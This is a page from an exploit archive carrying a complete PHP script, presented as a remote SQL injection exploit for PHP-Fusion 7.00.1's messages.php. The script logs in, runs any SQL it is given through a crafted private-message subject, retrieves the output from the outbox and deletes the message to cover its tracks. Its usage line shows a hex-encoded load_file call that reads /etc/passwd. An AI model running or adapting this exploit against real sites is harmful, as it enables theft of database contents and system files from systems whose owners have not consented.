what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

phpfusion7001-sql.txt

phpfusion7001-sql.txt
Posted Nov 20, 2008
Authored by irk4z

PHP-Fusion version 7.00.1 remote SQL injection exploit that makes use of messages.php.

tags | exploit, remote, php, sql injection
SHA-256 | 77817606cf5e9fed61740e8e7fda85ce50b412c3ee6fc324930edec411a37b22

phpfusion7001-sql.txt

Change Mirror Download
<?php
/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit
requires magic_quotes == off

coded by irk4z[at]yahoo.pl
homepage: http://irk4z.wordpress.com

greets: all friends ;)
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*/

$host = $argv[1];
$path = $argv[2];
$login = $argv[3];
$pass = $argv[4];
$sql_injection = $argv[5];

echo
"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n".
" PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\n".
" requires magic_quotes == off\n".
"\n".
" coded by irk4z[at]yahoo.pl\n".
" homepage: http://irk4z.wordpress.com\n".
"\n".
" greets: all friends ;)\n".
"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n";

if(empty($host) || empty($path) || empty($login) || empty($pass) || empty($sql_injection) ){
echo "Usage: php $argv[0] <host> <path> <login> <pass> <SQL>\n" .
" php $argv[0] localhost /php-fusion/ user s3cret \"SELECT database()\"\n".
" php $argv[0] localhost / user s3cret \"SELECT load_file(0x2F6574632F706173737764)\"\n\n";
die;
}

echo "Logging into system...";
//login to php-fusion using login and pass
$login_data = send($host, array( "path" => $path."news.php",
"post" => array(
"user_name" => $login,
"user_pass" => $pass,
"login" => "Login"
)
)
);

//get cookies
preg_match_all("/Set-Cookie:[\s]+([a-z_A-Z0-9]+=[a-z_A-Z0-9\.]+;)/", $login_data, $matches);
$cookies = implode(' ', $matches[1]);

//get user id
preg_match_all("/([0-9])+.([a-zA-Z0-9]{32})/", $cookies, $matches);
$my_id = $matches[1][0];

if(empty($my_id)){
echo "\n[x] Incorrect login or password..";
die;
} else {
echo "[ok]\n";
}

$id_message = uniqid();
$inhex = '';
for($i = 0; $i < strlen($id_message); $i++) $inhex .= dechex( ord($id_message[$i]) ) ;

echo "Running sql-injection...\n";
//running sql-injection
$res = send($host, array( "path" => $path."messages.php?msg_send={$my_id}%27%2F%2Axxx&",
"cookie" => $cookies,
"post" => array(
"send_message" => 'X',
"subject" => "X*/,0x{$inhex}, (SELECT/**/concat(0x{$inhex}{$inhex},hex(($sql_injection)),0x{$inhex}{$inhex})),0x79,1,1226787120,1)/*",
"message" => "XXX"
)
)
);

echo "Getting data...\n\n";
$res = send($host, array( "path" => $path."messages.php?folder=outbox",
"cookie" => $cookies )
);

preg_match_all("/msg_read=([0-9]+)'>{$id_message}<\/a>/", $res, $matches);
$id_message_number = $matches[1][0];

$res = send($host, array( "path" => $path."messages.php?folder=outbox&msg_read=".$id_message_number,
"cookie" => $cookies )
);

preg_match_all("/{$id_message}{$id_message}(.*){$id_message}{$id_message}/", $res, $matches);

if( empty($matches[1][0]) ){
echo "[x] Failed... maybe SQL-INJ is incorrect?\n\n";
} else {
$tmp = '';
$hex = $matches[1][0];
//unhex it!
for($i = 0; $i < strlen($hex); $i+=2) $tmp .= chr(hexdec($hex[$i] . $hex[$i+1]));
echo "DATA: \n".$tmp."\n\n";
}

echo "Deleting message...\n";

$res = send($host, array( "path" => $path."messages.php?folder=outbox&msg_id=".$id_message_number,
"cookie" => $cookies,
"post" => array (
"delete" => "Delete"
)
)
);

//send http packet
function send($host, $dane = "") {
$packet = (empty($dane['post']) ? "GET" : "POST") . " {$dane["path"]} HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";

if( !empty($dane['cookie']) ){
$packet .= "Cookie: {$dane['cookie']}\r\n";
}

if( !empty($dane['post']) ){
$reszta_syfu = "";
foreach($dane['post'] as $tmp => $tmp2){
$reszta_syfu .= $tmp . "=" . $tmp2 . "&";
}
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Content-Length: ".strlen($reszta_syfu)."\r\n\r\n";
$packet .= $reszta_syfu;
} else {
$packet .= "Connection: Close\r\n\r\n";
}

$o = @fsockopen($host, 80);
if(!$o){
echo "\n[x] No response...\n";
die;
}
fputs($o, $packet);
while (!feof($o)) $ret .= fread($o, 1024);
fclose($o);
return ($ret);
}

?>

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close